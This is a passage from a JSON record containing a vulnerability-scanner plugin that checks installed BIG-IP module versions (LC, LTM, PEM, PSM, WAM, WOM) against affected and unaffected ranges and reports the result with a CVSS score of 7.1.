make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.0.0-11.5.1\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"11.6.0\",\"11.5.2\",\"11.2.1HF15\",\"10.0.0-10.2.4\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.0.0-11.5.1\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"11.6.0\",\"11.5.2\",\"11.2.1HF15\",\"10.0.0-10.2.4\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.3.0-11.5.1\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"11.6.0\",\"11.5.2\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.0.0-11.4.1\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.2.1HF15\",\"10.0.0-10.2.4\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.2.1HF15\",\"10.0.0-10.2.4\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.2.1HF15\",\"10.0.0-10.2.4\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}]}
